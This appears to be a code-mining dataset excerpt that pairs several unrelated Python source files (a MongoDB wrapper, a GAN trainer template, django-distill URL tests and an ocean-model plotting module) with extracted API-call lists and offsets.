datetime import datetime, timedelta\n')] |
import database
import pymongo
from pymongo import MongoClient
import copy
class Database(database.Database):
def __init__(self):
database.Database.__init__(self)
client = None
db = None
collection = None
recent = None
host = 'localhost'
port = 27017
timeout = 20
database_name = 'radiowcs'
authkey = ''
table_name = 'playlist'
table_recent = 'recent'
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if (connection != None):
connection.close()
def connect(self):
"""Return db and client"""
client = MongoClient(self.host ,self.port)
db = client[self.database_name]
collection = db[self.table_name]
recent = db[self.table_recent]
return db, collection
def configure(self):
""" Not needed for mongodb"""
pass
def insert(item):
"""Insert into database"""
new_item = copy.deepcopy(item)
collection.insert(new_item)
recent.insert()
| [
"pymongo.MongoClient",
"database.Database.__init__",
"copy.deepcopy"
] | [((136, 168), 'database.Database.__init__', 'database.Database.__init__', (['self'], {}), '(self)\n', (162, 168), False, 'import database\n'), ((574, 607), 'pymongo.MongoClient', 'MongoClient', (['self.host', 'self.port'], {}), '(self.host, self.port)\n', (585, 607), False, 'from pymongo import MongoClient\n'), ((858, 877), 'copy.deepcopy', 'copy.deepcopy', (['item'], {}), '(item)\n', (871, 877), False, 'import copy\n')] |
import torch
from torchvision.utils import make_grid
import numpy as np
from base import BaseTrainer
from models import Generator, Discriminator
from losses import *
from data_loaders import CartoonDataLoader
from utils import MetricTracker
class ExpnameTrainer(BaseTrainer):
def __init__(self, config):
super(ExpnameTrainer, self).__init__(config)
self.logger.info("Creating data loaders...")
self.train_dataloader, self.valid_dataloader = self._build_dataloader()
self.log_step = int(np.sqrt(self.train_dataloader.batch_size))
self.logger.info("Creating model architecture...")
gen, disc = self._build_model()
# resume
if self.config.resume is not None:
self._resume_checkpoint(config.resume)
# move to device
self.gen = gen.to(self.device)
self.disc = disc.to(self.device)
if len(self.device_ids) > 1:
self.gen = torch.nn.DataParallel(self.gen, device_ids=self.device_ids)
self.disc = torch.nn.DataParallel(self.disc, device_ids=self.device_ids)
self.logger.info("Creating optimizers...")
self.gen_optim, self.disc_optim = self._build_optimizer(self.gen, self.disc)
# build loss
self.logger.info("Creating losses...")
self._build_criterion()
self.logger.info("Creating metric trackers...")
self._build_metrics()
def _build_dataloader(self):
train_dataloader = CartoonDataLoader(
data_dir=self.config.data_dir,
src_style='real',
tar_style=self.config.tar_style,
batch_size=self.config.batch_size,
image_size=self.config.image_size,
num_workers=self.config.num_workers)
valid_dataloader = train_dataloader.split_validation()
return train_dataloader, valid_dataloader
def _build_model(self):
""" build generator and discriminator model """
gen = Generator(self.config.image_size, self.config.down_size, self.config.num_res, self.config.skip_conn)
disc = Discriminator(self.config.image_size, self.config.down_size)
return gen, disc
def _build_optimizer(self, gen, disc):
""" build generator and discriminator optimizers """
gen_optim = torch.optim.AdamW(
gen.parameters(),
lr=self.config.g_lr,
weight_decay=self.config.weight_decay,
betas=(0.5, 0.999))
disc_optim = torch.optim.AdamW(
disc.parameters(),
lr=self.config.d_lr,
weight_decay=self.config.weight_decay,
betas=(0.5, 0.999))
return gen_optim, disc_optim
def _build_criterion(self):
self.adv_criterion = eval('{}Loss'.format(self.config.adv_criterion))()
# TODO add extra criterion you need here
def _build_metrics(self):
# TODO: add the loss you want to log here
self.metric_names = ['disc', 'gen']
self.train_metrics = MetricTracker(*[metric for metric in self.metric_names], writer=self.writer)
self.valid_metrics = MetricTracker(*[metric for metric in self.metric_names], writer=self.writer)
def _train_epoch(self, epoch):
"""
Training logic for an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains average loss and metric in this epoch.
"""
self.gen.train()
self.disc.train()
self.train_metrics.reset()
for batch_idx, (src_imgs, tar_imgs) in enumerate(self.train_dataloader):
src_imgs, tar_imgs = src_imgs.to(self.device), tar_imgs.to(self.device)
self.gen_optim.zero_grad()
self.disc_optim.zero_grad()
raise NotImplementedError
# ============ Generation ============ #
# ============ train D ============ #
# ============ train G ============ #
# ============ log ============ #
self.writer.set_step((epoch - 1) * len(self.train_dataloader) + batch_idx)
# TODO: add the loss you want to log here
if batch_idx % self.log_step == 0:
self.logger.info('Train Epoch: {:d} {:d} Disc. Loss: {:.4f} Gen. Loss {:.4f}'.format(
epoch,
self._progress(batch_idx),
disc_loss.item(),
gen_loss.item()))
log = self.train_metrics.result()
val_log = self._valid_epoch(epoch)
log.update(**{'val_'+k : v for k, v in val_log.items()})
# shuffle data loader
self.train_dataloader.shuffle()
return log
def _valid_epoch(self, epoch):
"""
Validate after training an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.gen.eval()
self.disc.eval()
disc_losses = []
gen_losses = []
self.valid_metrics.reset()
with torch.no_grad():
for batch_idx, (src_imgs, tar_imgs) in enumerate(self.valid_dataloader):
src_imgs, tar_imgs = src_imgs.to(self.device), tar_imgs.to(self.device)
# TODO similar to train but not optimizer.step()
raise NotImplementedError
# ============ Generation ============ #
# ============ D Loss ============ #
# ============ G Loss ============ #
# log losses
self.writer.set_step(epoch)
self.valid_metrics.update('disc', np.mean(disc_losses))
self.valid_metrics.update('gen', np.mean(gen_losses))
# log images
src_tar_imgs = torch.cat([src_imgs.cpu(), fake_tar_imgs.cpu()], dim=-1)
self.writer.add_image('src2tar', make_grid(src_tar_imgs.cpu(), nrow=1, normalize=True))
return self.valid_metrics.result()
def _save_checkpoint(self, epoch):
"""
Saving checkpoints
:param epoch: current epoch number
:param log: logging information of the epoch
:param save_best: if True, rename the saved checkpoint to 'model_best.pth'
"""
state = {
'epoch': epoch,
'gen_state_dict': self.gen.state_dict() if len(self.device_ids) <= 1 else self.gen.module.state_dict(),
'disc_state_dict': self.disc.state_dict() if len(self.device_ids) <= 1 else self.disc.module.state_dict(),
'gen_optim': self.gen_optim.state_dict(),
'disc_optim': self.disc_optim.state_dict()
}
filename = str(self.config.checkpoint_dir + 'current.pth')
torch.save(state, filename)
self.logger.info("Saving checkpoint: {} ...".format(filename))
if epoch % self.save_period == 0:
filename = str(self.config.checkpoint_dir + 'epoch{}.pth'.format(epoch))
torch.save(state, filename)
self.logger.info("Saving checkpoint: {} ...".format(filename))
def _resume_checkpoint(self, resume_path):
"""
Resume from saved checkpoints
:param resume_path: Checkpoint path to be resumed
"""
resume_path = str(resume_path)
self.logger.info("Loading checkpoint: {} ...".format(resume_path))
checkpoint = torch.load(resume_path)
self.start_epoch = checkpoint['epoch'] + 1
# load architecture params from checkpoint.
self.gen.load_state_dict(checkpoint['gen_state_dict'])
self.disc.load_state_dict(checkpoint['disc_state_dict'])
# load optimizer state from checkpoint only when optimizer type is not changed.
self.gen_optim.load_state_dict(checkpoint['gen_optim'])
self.disc_optim.load_state_dict(checkpoint['disc_optim'])
self.logger.info("Checkpoint loaded. Resume training from epoch {}".format(self.start_epoch))
| [
"numpy.mean",
"numpy.sqrt",
"models.Generator",
"torch.load",
"data_loaders.CartoonDataLoader",
"torch.nn.DataParallel",
"models.Discriminator",
"utils.MetricTracker",
"torch.save",
"torch.no_grad"
] | [((1475, 1689), 'data_loaders.CartoonDataLoader', 'CartoonDataLoader', ([], {'data_dir': 'self.config.data_dir', 'src_style': '"""real"""', 'tar_style': 'self.config.tar_style', 'batch_size': 'self.config.batch_size', 'image_size': 'self.config.image_size', 'num_workers': 'self.config.num_workers'}), "(data_dir=self.config.data_dir, src_style='real',\n tar_style=self.config.tar_style, batch_size=self.config.batch_size,\n image_size=self.config.image_size, num_workers=self.config.num_workers)\n", (1492, 1689), False, 'from data_loaders import CartoonDataLoader\n'), ((1967, 2072), 'models.Generator', 'Generator', (['self.config.image_size', 'self.config.down_size', 'self.config.num_res', 'self.config.skip_conn'], {}), '(self.config.image_size, self.config.down_size, self.config.\n num_res, self.config.skip_conn)\n', (1976, 2072), False, 'from models import Generator, Discriminator\n'), ((2083, 2143), 'models.Discriminator', 'Discriminator', (['self.config.image_size', 'self.config.down_size'], {}), '(self.config.image_size, self.config.down_size)\n', (2096, 2143), False, 'from models import Generator, Discriminator\n'), ((2999, 3075), 'utils.MetricTracker', 'MetricTracker', (['*[metric for metric in self.metric_names]'], {'writer': 'self.writer'}), '(*[metric for metric in self.metric_names], writer=self.writer)\n', (3012, 3075), False, 'from utils import MetricTracker\n'), ((3105, 3181), 'utils.MetricTracker', 'MetricTracker', (['*[metric for metric in self.metric_names]'], {'writer': 'self.writer'}), '(*[metric for metric in self.metric_names], writer=self.writer)\n', (3118, 3181), False, 'from utils import MetricTracker\n'), ((6700, 6727), 'torch.save', 'torch.save', (['state', 'filename'], {}), '(state, filename)\n', (6710, 6727), False, 'import torch\n'), ((7346, 7369), 'torch.load', 'torch.load', (['resume_path'], {}), '(resume_path)\n', (7356, 7369), False, 'import torch\n'), ((525, 566), 'numpy.sqrt', 'np.sqrt', (['self.train_dataloader.batch_size'], {}), '(self.train_dataloader.batch_size)\n', (532, 566), True, 'import numpy as np\n'), ((944, 1003), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['self.gen'], {'device_ids': 'self.device_ids'}), '(self.gen, device_ids=self.device_ids)\n', (965, 1003), False, 'import torch\n'), ((1028, 1088), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['self.disc'], {'device_ids': 'self.device_ids'}), '(self.disc, device_ids=self.device_ids)\n', (1049, 1088), False, 'import torch\n'), ((5035, 5050), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5048, 5050), False, 'import torch\n'), ((6939, 6966), 'torch.save', 'torch.save', (['state', 'filename'], {}), '(state, filename)\n', (6949, 6966), False, 'import torch\n'), ((5612, 5632), 'numpy.mean', 'np.mean', (['disc_losses'], {}), '(disc_losses)\n', (5619, 5632), True, 'import numpy as np\n'), ((5679, 5698), 'numpy.mean', 'np.mean', (['gen_losses'], {}), '(gen_losses)\n', (5686, 5698), True, 'import numpy as np\n')] |
from django.conf import settings
from django.http import HttpResponse
from django.urls import include, path
from django.contrib.flatpages.views import flatpage as flatpage_view
from django.apps import apps as django_apps
from django_distill import distill_url, distill_path, distill_re_path
def test_no_param_view(request):
return HttpResponse(b'test', content_type='application/octet-stream')
def test_positional_param_view(request, param):
return HttpResponse(b'test' + param.encode(),
content_type='application/octet-stream')
def test_named_param_view(request, param=None):
return HttpResponse(b'test' + param.encode(),
content_type='application/octet-stream')
def test_session_view(request):
request.session['test'] = 'test'
return HttpResponse(b'test', content_type='application/octet-stream')
def test_broken_view(request):
# Trigger a normal Python exception when rendering
a = 1 / 0
def test_http404_view(request):
response = HttpResponse(b'404', content_type='application/octet-stream')
response.status_code = 404
return response
def test_no_param_func():
return None
def test_positional_param_func():
return ('12345',)
def test_named_param_func():
return [{'param': 'test'}]
def test_flatpages_func():
Site = django_apps.get_model('sites.Site')
current_site = Site.objects.get_current()
flatpages = current_site.flatpage_set.filter(registration_required=False)
for flatpage in flatpages:
yield {'url': flatpage.url}
urlpatterns = [
distill_url(r'^url/$',
test_no_param_view,
name='url-no-param',
distill_func=test_no_param_func,
distill_file='test'),
distill_url(r'^url-no-func/$',
test_no_param_view,
name='url-no-param-no-func',
distill_file='test'),
distill_url(r'^url/([\d]+)$',
test_positional_param_view,
name='url-positional-param',
distill_func=test_positional_param_func),
distill_url(r'^url/(?P<param>[\w]+)$',
test_named_param_view,
name='url-named-param',
distill_func=test_named_param_func),
path('path/namespace1/',
include('tests.namespaced_urls', namespace='test_namespace')),
path('path/no-namespace/',
include('tests.no_namespaced_urls')),
]
if settings.HAS_RE_PATH:
urlpatterns += [
distill_re_path(r'^re_path/$',
test_no_param_view,
name='re_path-no-param',
distill_func=test_no_param_func,
distill_file='test'),
distill_re_path(r'^re_path-no-func/$',
test_no_param_view,
name='re_path-no-param-no-func',
distill_file='test'),
distill_re_path(r'^re_path/([\d]+)$',
test_positional_param_view,
name='re_path-positional-param',
distill_func=test_positional_param_func),
distill_re_path(r'^re_path/(?P<param>[\w]+)$',
test_named_param_view,
name='re_path-named-param',
distill_func=test_named_param_func),
distill_re_path(r'^re_path/broken$',
test_broken_view,
name='re_path-broken',
distill_func=test_no_param_func),
distill_re_path(r'^re_path/ignore-sessions$',
test_session_view,
name='re_path-ignore-sessions',
distill_func=test_no_param_func),
distill_re_path(r'^re_path/404$',
test_http404_view,
name='re_path-404',
distill_status_codes=(404,),
distill_func=test_no_param_func),
distill_re_path(r'^re_path/flatpage(?P<url>.+)$',
flatpage_view,
name='re_path-flatpage',
distill_func=test_flatpages_func),
]
if settings.HAS_PATH:
urlpatterns += [
distill_path('path/',
test_no_param_view,
name='path-no-param',
distill_func=test_no_param_func,
distill_file='test'),
distill_path('path-no-func/',
test_no_param_view,
name='path-no-param-no-func',
distill_file='test'),
distill_path('path/<int>',
test_positional_param_view,
name='path-positional-param',
distill_func=test_positional_param_func),
distill_path('path/<str:param>',
test_named_param_view,
name='path-named-param',
distill_func=test_named_param_func),
distill_path('path/broken',
test_broken_view,
name='path-broken',
distill_func=test_no_param_func),
distill_path('path/ignore-sessions',
test_session_view,
name='path-ignore-sessions',
distill_func=test_no_param_func),
distill_path('path/404',
test_http404_view,
name='path-404',
distill_status_codes=(404,),
distill_func=test_no_param_func),
distill_path('path/flatpage<path:url>',
flatpage_view,
name='path-flatpage',
distill_func=test_flatpages_func),
]
| [
"django_distill.distill_re_path",
"django.urls.include",
"django.http.HttpResponse",
"django_distill.distill_url",
"django_distill.distill_path",
"django.apps.apps.get_model"
] | [((337, 399), 'django.http.HttpResponse', 'HttpResponse', (["b'test'"], {'content_type': '"""application/octet-stream"""'}), "(b'test', content_type='application/octet-stream')\n", (349, 399), False, 'from django.http import HttpResponse\n'), ((812, 874), 'django.http.HttpResponse', 'HttpResponse', (["b'test'"], {'content_type': '"""application/octet-stream"""'}), "(b'test', content_type='application/octet-stream')\n", (824, 874), False, 'from django.http import HttpResponse\n'), ((1026, 1087), 'django.http.HttpResponse', 'HttpResponse', (["b'404'"], {'content_type': '"""application/octet-stream"""'}), "(b'404', content_type='application/octet-stream')\n", (1038, 1087), False, 'from django.http import HttpResponse\n'), ((1343, 1378), 'django.apps.apps.get_model', 'django_apps.get_model', (['"""sites.Site"""'], {}), "('sites.Site')\n", (1364, 1378), True, 'from django.apps import apps as django_apps\n'), ((1593, 1714), 'django_distill.distill_url', 'distill_url', (['"""^url/$"""', 'test_no_param_view'], {'name': '"""url-no-param"""', 'distill_func': 'test_no_param_func', 'distill_file': '"""test"""'}), "('^url/$', test_no_param_view, name='url-no-param', distill_func\n =test_no_param_func, distill_file='test')\n", (1604, 1714), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((1748, 1852), 'django_distill.distill_url', 'distill_url', (['"""^url-no-func/$"""', 'test_no_param_view'], {'name': '"""url-no-param-no-func"""', 'distill_file': '"""test"""'}), "('^url-no-func/$', test_no_param_view, name=\n 'url-no-param-no-func', distill_file='test')\n", (1759, 1852), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((1878, 2010), 'django_distill.distill_url', 'distill_url', (['"""^url/([\\\\d]+)$"""', 'test_positional_param_view'], {'name': '"""url-positional-param"""', 'distill_func': 'test_positional_param_func'}), "('^url/([\\\\d]+)$', test_positional_param_view, name=\n 'url-positional-param', distill_func=test_positional_param_func)\n", (1889, 2010), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2035, 2161), 'django_distill.distill_url', 'distill_url', (['"""^url/(?P<param>[\\\\w]+)$"""', 'test_named_param_view'], {'name': '"""url-named-param"""', 'distill_func': 'test_named_param_func'}), "('^url/(?P<param>[\\\\w]+)$', test_named_param_view, name=\n 'url-named-param', distill_func=test_named_param_func)\n", (2046, 2161), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2219, 2279), 'django.urls.include', 'include', (['"""tests.namespaced_urls"""'], {'namespace': '"""test_namespace"""'}), "('tests.namespaced_urls', namespace='test_namespace')\n", (2226, 2279), False, 'from django.urls import include, path\n'), ((2321, 2356), 'django.urls.include', 'include', (['"""tests.no_namespaced_urls"""'], {}), "('tests.no_namespaced_urls')\n", (2328, 2356), False, 'from django.urls import include, path\n'), ((2419, 2551), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/$"""', 'test_no_param_view'], {'name': '"""re_path-no-param"""', 'distill_func': 'test_no_param_func', 'distill_file': '"""test"""'}), "('^re_path/$', test_no_param_view, name='re_path-no-param',\n distill_func=test_no_param_func, distill_file='test')\n", (2434, 2551), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2606, 2722), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path-no-func/$"""', 'test_no_param_view'], {'name': '"""re_path-no-param-no-func"""', 'distill_file': '"""test"""'}), "('^re_path-no-func/$', test_no_param_view, name=\n 're_path-no-param-no-func', distill_file='test')\n", (2621, 2722), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2764, 2908), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/([\\\\d]+)$"""', 'test_positional_param_view'], {'name': '"""re_path-positional-param"""', 'distill_func': 'test_positional_param_func'}), "('^re_path/([\\\\d]+)$', test_positional_param_view, name=\n 're_path-positional-param', distill_func=test_positional_param_func)\n", (2779, 2908), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2949, 3087), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/(?P<param>[\\\\w]+)$"""', 'test_named_param_view'], {'name': '"""re_path-named-param"""', 'distill_func': 'test_named_param_func'}), "('^re_path/(?P<param>[\\\\w]+)$', test_named_param_view, name=\n 're_path-named-param', distill_func=test_named_param_func)\n", (2964, 3087), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3128, 3241), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/broken$"""', 'test_broken_view'], {'name': '"""re_path-broken"""', 'distill_func': 'test_no_param_func'}), "('^re_path/broken$', test_broken_view, name='re_path-broken',\n distill_func=test_no_param_func)\n", (3143, 3241), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3284, 3417), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/ignore-sessions$"""', 'test_session_view'], {'name': '"""re_path-ignore-sessions"""', 'distill_func': 'test_no_param_func'}), "('^re_path/ignore-sessions$', test_session_view, name=\n 're_path-ignore-sessions', distill_func=test_no_param_func)\n", (3299, 3417), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3459, 3596), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/404$"""', 'test_http404_view'], {'name': '"""re_path-404"""', 'distill_status_codes': '(404,)', 'distill_func': 'test_no_param_func'}), "('^re_path/404$', test_http404_view, name='re_path-404',\n distill_status_codes=(404,), distill_func=test_no_param_func)\n", (3474, 3596), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3651, 3778), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/flatpage(?P<url>.+)$"""', 'flatpage_view'], {'name': '"""re_path-flatpage"""', 'distill_func': 'test_flatpages_func'}), "('^re_path/flatpage(?P<url>.+)$', flatpage_view, name=\n 're_path-flatpage', distill_func=test_flatpages_func)\n", (3666, 3778), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3873, 3994), 'django_distill.distill_path', 'distill_path', (['"""path/"""', 'test_no_param_view'], {'name': '"""path-no-param"""', 'distill_func': 'test_no_param_func', 'distill_file': '"""test"""'}), "('path/', test_no_param_view, name='path-no-param',\n distill_func=test_no_param_func, distill_file='test')\n", (3885, 3994), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4048, 4153), 'django_distill.distill_path', 'distill_path', (['"""path-no-func/"""', 'test_no_param_view'], {'name': '"""path-no-param-no-func"""', 'distill_file': '"""test"""'}), "('path-no-func/', test_no_param_view, name=\n 'path-no-param-no-func', distill_file='test')\n", (4060, 4153), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4194, 4324), 'django_distill.distill_path', 'distill_path', (['"""path/<int>"""', 'test_positional_param_view'], {'name': '"""path-positional-param"""', 'distill_func': 'test_positional_param_func'}), "('path/<int>', test_positional_param_view, name=\n 'path-positional-param', distill_func=test_positional_param_func)\n", (4206, 4324), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4365, 4486), 'django_distill.distill_path', 'distill_path', (['"""path/<str:param>"""', 'test_named_param_view'], {'name': '"""path-named-param"""', 'distill_func': 'test_named_param_func'}), "('path/<str:param>', test_named_param_view, name=\n 'path-named-param', distill_func=test_named_param_func)\n", (4377, 4486), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4527, 4629), 'django_distill.distill_path', 'distill_path', (['"""path/broken"""', 'test_broken_view'], {'name': '"""path-broken"""', 'distill_func': 'test_no_param_func'}), "('path/broken', test_broken_view, name='path-broken',\n distill_func=test_no_param_func)\n", (4539, 4629), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4671, 4793), 'django_distill.distill_path', 'distill_path', (['"""path/ignore-sessions"""', 'test_session_view'], {'name': '"""path-ignore-sessions"""', 'distill_func': 'test_no_param_func'}), "('path/ignore-sessions', test_session_view, name=\n 'path-ignore-sessions', distill_func=test_no_param_func)\n", (4683, 4793), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4834, 4960), 'django_distill.distill_path', 'distill_path', (['"""path/404"""', 'test_http404_view'], {'name': '"""path-404"""', 'distill_status_codes': '(404,)', 'distill_func': 'test_no_param_func'}), "('path/404', test_http404_view, name='path-404',\n distill_status_codes=(404,), distill_func=test_no_param_func)\n", (4846, 4960), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((5014, 5128), 'django_distill.distill_path', 'distill_path', (['"""path/flatpage<path:url>"""', 'flatpage_view'], {'name': '"""path-flatpage"""', 'distill_func': 'test_flatpages_func'}), "('path/flatpage<path:url>', flatpage_view, name='path-flatpage',\n distill_func=test_flatpages_func)\n", (5026, 5128), False, 'from django_distill import distill_url, distill_path, distill_re_path\n')] |
# Copyright 2013-2021 The Salish Sea MEOPAR contributors
# and The University of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Produce a figure that shows colour contours of a tracer on a vertical slice
along a section of the domain thalweg,
and on the surface for a section of the domain that excludes Puget Sound
in the south and Johnstone Strait in the north.
Testing notebook for this module is
https://nbviewer.jupyter.org/github/SalishSeaCast/SalishSeaNowcast/blob/main/notebooks/figures/research/TestTracerThalwegAndSurfaceHourly.ipynb
"""
from types import SimpleNamespace
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
from salishsea_tools import visualisations as vis
from salishsea_tools import viz_tools
import nowcast.figures.website_theme
def make_figure(
hr,
tracer_var,
bathy,
mesh_mask,
clevels_thalweg,
clevels_surface,
cmap,
depth_integrated,
figsize=(16, 9),
theme=nowcast.figures.website_theme,
):
"""Plot colour contours of tracer on a vertical slice along a section of
the domain thalweg,
and on the surface for the Strait of Georgia and Juan de Fuca Strait
regions of the domain.
:param hr: UTC time in hours
:type hr: :class: str
:param tracer_var: Hourly average tracer results from NEMO run.
:type tracer_var: :py:class:`netCDF4.Variable`
:param bathy: Salish Sea NEMO model bathymetry data.
:type bathy: :class:`netCDF4.Dataset`
:param mesh_mask: NEMO-generated mesh mask for run that produced tracer_var.
:type mesh_mask: :class:`netCDF4.Dataset`
:param clevels_thalweg: Colour bar contour intervals for thalweg plot.
:type clevels_thalweg: :class:`numpy.ndarray`
:param clevels_surface: Colour bar contour intervals for surface plot.
:type clevels_surface: :class:`numpy.ndarray`
:param cmap: Colour map to use for tracer_var contour plots.
:type cmap: :py:class:`matplotlib.colors.LinearSegmentedColormap`
:param boolean depth_integrated: Integrate the tracer over the water column
depth when :py:obj:`True`.
:param 2-tuple figsize: Figure size (width, height) in inches.
:param theme: Module-like object that defines the style elements for the
figure. See :py:mod:`nowcast.figures.website_theme` for an
example.
:returns: :py:class:`matplotlib.figure.Figure`
"""
plot_data = _prep_plot_data(hr, tracer_var, mesh_mask, depth_integrated)
fig, (ax_thalweg, ax_surface) = _prep_fig_axes(figsize, theme)
cbar_thalweg = _plot_tracer_thalweg(
ax_thalweg, plot_data, bathy, mesh_mask, cmap, clevels_thalweg
)
_thalweg_axes_labels(ax_thalweg, plot_data, clevels_thalweg, cbar_thalweg, theme)
cbar_surface = _plot_tracer_surface(ax_surface, plot_data, cmap, clevels_surface)
_surface_axes_labels(
ax_surface, tracer_var, depth_integrated, clevels_surface, cbar_surface, theme
)
return fig
def clevels(tracer_var, mesh_mask, depth_integrated):
"""Calculate the colour bar contour intervals for the thalweg and surface
plot axes based on the tracer variable values at hr=0.
:param tracer_var: Hourly average tracer results from NEMO run.
:type tracer_var: :py:class:`netCDF4.Variable`
:param mesh_mask: NEMO-generated mesh mask for run that produced tracer_var.
:type mesh_mask: :class:`netCDF4.Dataset`
:param boolean depth_integrated: Integrate the tracer over the water column
depth when :py:obj:`True`.
:returns: Colour bar contour intervals for thalweg and surface plot axes.
:rtype: 2-tuple of :class:`numpy.ndarray` objects
"""
plot_data = _prep_plot_data(0, tracer_var, mesh_mask, depth_integrated)
clevels_thalweg, clevels_surface = _calc_clevels(plot_data)
return clevels_thalweg, clevels_surface
def _prep_plot_data(hr, tracer_var, mesh_mask, depth_integrated):
sj, ej = 200, 800
si, ei = 20, 395
tracer_hr = tracer_var[hr]
masked_tracer_hr = np.ma.masked_where(mesh_mask["tmask"][0, ...] == 0, tracer_hr)
surface_hr = masked_tracer_hr[0, sj:ej, si:ei]
if depth_integrated:
grid_heights = mesh_mask.variables["e3t_1d"][:][0].reshape(
tracer_hr.shape[0], 1, 1
)
height_weighted = masked_tracer_hr[:, sj:ej, si:ei] * grid_heights
surface_hr = height_weighted.sum(axis=0)
return SimpleNamespace(
tracer_var=tracer_var,
tracer_hr=tracer_hr,
surface_hr=surface_hr,
surface_j_limits=(sj, ej),
surface_i_limits=(si, ei),
thalweg_depth_limits=(0, 450),
thalweg_length_limits=(0, 632),
)
def _prep_fig_axes(figsize, theme):
fig = plt.figure(figsize=figsize, facecolor=theme.COLOURS["figure"]["facecolor"])
gs = gridspec.GridSpec(1, 2, width_ratios=[1.4, 1])
ax_thalweg = fig.add_subplot(gs[0])
ax_thalweg.set_facecolor(theme.COLOURS["axes"]["background"])
ax_surface = fig.add_subplot(gs[1])
ax_surface.set_facecolor(theme.COLOURS["axes"]["background"])
return fig, (ax_thalweg, ax_surface)
def _calc_clevels(plot_data):
"""Calculate contour levels for the thalweg and surface plot axes."""
percent_98_thalweg = np.percentile(
np.ma.masked_values(plot_data.tracer_hr, 0).compressed(), 98
)
percent_2_thalweg = np.percentile(
np.ma.masked_values(plot_data.tracer_hr, 0).compressed(), 2
)
percent_98_surf = np.percentile(plot_data.surface_hr.compressed(), 98)
percent_2_surf = np.percentile(plot_data.surface_hr.compressed(), 2)
clevels_thalweg = np.arange(
percent_2_thalweg,
percent_98_thalweg,
(percent_98_thalweg - percent_2_thalweg) / 20.0,
)
clevels_surface = np.arange(
percent_2_surf, percent_98_surf, (percent_98_surf - percent_2_surf) / 20.0
)
return clevels_thalweg, clevels_surface
def _plot_tracer_thalweg(ax, plot_data, bathy, mesh_mask, cmap, clevels):
cbar = vis.contour_thalweg(
ax,
plot_data.tracer_hr,
bathy,
mesh_mask,
clevels=clevels,
cmap=cmap,
## TODO: Can this path be moved into nowcast.yaml config file?
thalweg_file="/SalishSeaCast/tools/bathymetry/thalweg_working" ".txt",
cbar_args={"fraction": 0.030, "pad": 0.04, "aspect": 45},
)
return cbar
def _thalweg_axes_labels(ax, plot_data, clevels, cbar, theme):
ax.set_xlim(plot_data.thalweg_length_limits)
ax.set_ylim(plot_data.thalweg_depth_limits[1], plot_data.thalweg_depth_limits[0])
label = f"{plot_data.tracer_var.long_name} [{plot_data.tracer_var.units}]"
_cbar_labels(cbar, clevels[::2], theme, label)
ax.set_xlabel(
"Distance along thalweg [km]",
color=theme.COLOURS["text"]["axis"],
fontproperties=theme.FONTS["axis"],
)
ax.set_ylabel(
"Depth [m]",
color=theme.COLOURS["text"]["axis"],
fontproperties=theme.FONTS["axis"],
)
theme.set_axis_colors(ax)
def _cbar_labels(cbar, contour_intervals, theme, label):
cbar.set_ticks(contour_intervals)
cbar.ax.axes.tick_params(labelcolor=theme.COLOURS["cbar"]["tick labels"])
cbar.set_label(
label, fontproperties=theme.FONTS["axis"], color=theme.COLOURS["text"]["axis"]
)
def _plot_tracer_surface(ax, plot_data, cmap, clevels):
x, y = np.meshgrid(
np.arange(*plot_data.surface_i_limits, dtype=int),
np.arange(*plot_data.surface_j_limits, dtype=int),
)
mesh = ax.contourf(
x, y, plot_data.surface_hr, levels=clevels, cmap=cmap, extend="both"
)
cbar = plt.colorbar(mesh, ax=ax, fraction=0.034, pad=0.04, aspect=45)
return cbar
def _surface_axes_labels(ax, tracer_var, depth_integrated, clevels, cbar, theme):
cbar_units = f"{tracer_var.units}*m" if depth_integrated else f"{tracer_var.units}"
cbar_label = f"{tracer_var.long_name} [{cbar_units}]"
_cbar_labels(cbar, clevels[::2], theme, cbar_label)
ax.set_xlabel(
"Grid x",
color=theme.COLOURS["text"]["axis"],
fontproperties=theme.FONTS["axis"],
)
ax.set_ylabel(
"Grid y",
color=theme.COLOURS["text"]["axis"],
fontproperties=theme.FONTS["axis"],
)
ax.set_facecolor("burlywood")
viz_tools.set_aspect(ax)
theme.set_axis_colors(ax)
| [
"numpy.ma.masked_values",
"types.SimpleNamespace",
"matplotlib.pyplot.colorbar",
"numpy.ma.masked_where",
"matplotlib.pyplot.figure",
